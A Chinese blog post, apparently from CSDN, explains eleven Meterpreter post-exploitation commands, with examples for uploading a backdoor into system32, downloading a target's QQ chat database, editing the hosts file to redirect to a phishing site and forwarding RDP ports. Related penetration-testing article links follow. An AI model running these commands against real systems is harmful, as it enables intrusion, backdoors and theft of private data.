Meterpreter模块32个命令用法

最新推荐文章于 2024-05-21 12:39:00 发布
最新推荐文章于 2024-05-21 12:39:00 发布
阅读量1.6k 收藏 17
点赞数 1
分类专栏: 渗透测试 linux tools
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haha13l4/article/details/90180934
版权

仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。
1、background命令
返回,把meterpreter后台挂起
2、session命令
session 命令可以查看已经成功获取的会话
可以使用session -i 连接到指定序号的meterpreter会话已继续利用
3、shell命令
获取目标主机的远程命令行shell
如果出错,考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理员用户进程中再尝试
在这里插入图片描述
4、cat命令
查看目标主机上的文档内容
例如:cat C:\boot.ini 查看目标主机启动引导信息
在这里插入图片描述
5、getwd命令
获取系统工作的当前目录
6、upload命令
上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下
upload setup.exe C:\windows\system32
在这里插入图片描述
7、download命令
把目标主机上的文件下载到我们的攻击主机上
例如:把目标主机C盘根目录下的boot.ini文件下载到攻击主机的/root/目录下
download C:\boot.ini /root/
在这里插入图片描述
download C:\“Program Files”\Tencent\QQ\Users\295******125\Msg2.0.db /root/
把目标主机上的QQ聊天记录下载到攻击主机的root目录下(仅实验用途,是否要考虑变更你QQ程序的安装路径了呢)
8、edit命令
调用vi编辑器,对目标主机上的文件修改
例如修改目标主机上的hosts文件,使得目标主机访问baidu时去到准备好的钓鱼网站(仅限实验用途)
在这里插入图片描述
9、search命令
在目标主机文件系统上查找搜索文件
例如:search -d c:\ -f *.doc
在目标主机C盘下搜索doc文档
10、ipconfig命令
这个不多说,查看目标主机上的网络参数
11、portfwd命令
端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176
把目标主机192.168.250.176的3389端口转发到1122端口
这是只需要连接目标的1122端口就可以打开远程桌面了
rde

最低0.47元/天 解锁文章
haha13l4
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)
qq_45138120的博客
06-23 7592
包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
ZL_1618的博客
06-14 2384
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令
meterpreter模块
最新发布
qq_52712762的博客
05-21 519
meterpreter
metasploit快速入门(一)安装部署
whatday的专栏
11-03 8522
目录 简介 1 在Windows上安装Metasploit 2在Linux和MacOS上安装Metasploit 3在Kali Linux上使用Metasploit 4升级Kali Linux 5构建渗透测试实验环境 6配置SSH连接 7使用SSH连接到Kali 8配置PostgreSQL数据库 9创建工作区 10使用数据库 11 使用 hosts 命令 ...
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 802
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
MSF中sessions命令使用
qq_44624916的博客
11-28 5222
MSF使用
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 不仅仅是一个简单的 shell,它是一个完整的后渗透环境,支持多种扩展模块和功能。它能够创建持久化的连接,即使在目标系统重启后也能保持控制。此外,Meterpreter 还允许测试者在不同的会话之间切换,...
E026-渗透测试常用工具-使用meterpreter模块进行后渗透测试.pdf
12-02
本课程主要讲解如何使用Meterpreter模块进行后渗透测试。 首先,了解MeterpreterMeterpreter是一种动态的、交互式的远程控制工具,它是Metasploit框架的一部分。它可以在多种操作系统上运行,包括Windows、Linux...
第六十七课:meterpreter下的irb操作第一季1
08-03
快速获取当前绝对路径,我们可以使用`client.fs.dir`命令,这是一个用于文件系统操作的方法,可以用来获取文件或目录的路径信息。虽然在示例中没有给出完整命令,但通常`client.fs.dir.abs_path('relative/path')`会...
Metasploit后渗透模块开发-三米前有蕉皮1
08-03
此外,使用`meterpreter > sysinfo`命令可以获取目标系统的详细信息,包括计算机名、操作系统、架构、语言、域和已登录用户等。 在Metasploit框架的开发过程中,`pry`是一个非常有用的调试工具,它提供了交互式的...
kali-linux 工具Metasploit离线式攻击使用教程
12-29
本教程将聚焦于Metasploit的离线攻击使用方法,这对于那些在没有互联网连接或者需要保持匿名状态的环境中工作的安全专家尤其重要。 Metasploit框架是一个开源项目,它提供了大量的攻击模块,涵盖了网络扫描、漏洞...
Centos7离线安装metasploit详细教程.pdf
09-05
centos7离线安装metasploit教程,最近需在内网服务器搭建安全工具环境,苦于内网服务器无法访问互联网,需要很多依赖包比较麻烦,尤其metasploit无互联网安装特别麻烦,而且网上metasploit的安装教程均是在线一键安装教程,对于无法访问互联网的服务器进行安装均无效,经过多次测试终于完成离线安装,先整理了下安装过程步骤。
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
如何安装metasploit
m0_62395433的博客
03-17 2725
1. 找到安装路径的bin文件夹,复制路径 打开环境变量,设置环境变量
Meterpreter基本命令详解
小人物的博客
05-14 2714
基本命令 1.background 命令    将Meterpreter终端隐藏在后台 2.sessions 命令   查看已经成功获取的会话 3.quit 命令    直接关闭当前的Meterpreter命令 4.shell 命令   可以获取系统的控制台Shell,如果目标系统上的命
Metasploit 安装教程
温氏效应
11-22 3800
Rapid7 为 Linux,Windows 和 OS X 操作系统上的 Metasploit 框架提供了开源安装程序。Metasploit 安装程序附带了运行 Metasploit 框架所需的所有必需依赖项。它包括 msfconsole 并安装了相关的工具,例如 Ripper 和 Nmap。
Metasploit***技巧:后***Meterpreter代理
weixin_34413103的博客
01-22 665
前言Metasploit是一个免费的、可下载的***测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施***测试。它本身附带数百个已知软件漏洞的专业级漏洞***测试工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为***,每个人都可以使用***工具来测试那些未打过补丁或者刚刚打过补丁的...
metasploit工具的Windows版安装及使用教程
热门推荐
爱国小白帽
03-29 2万+
点击下载 msfconsole
meterpreter使用教程
u011250160的博客
04-26 1648
Core Commands ============= Command Description ------- ----------- ? 在meterpreter下输入?和help是一样的就是显示所有的参数 background background和bg是一样的,后台运行shell,也相当于ctrl+z进入后台运行

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值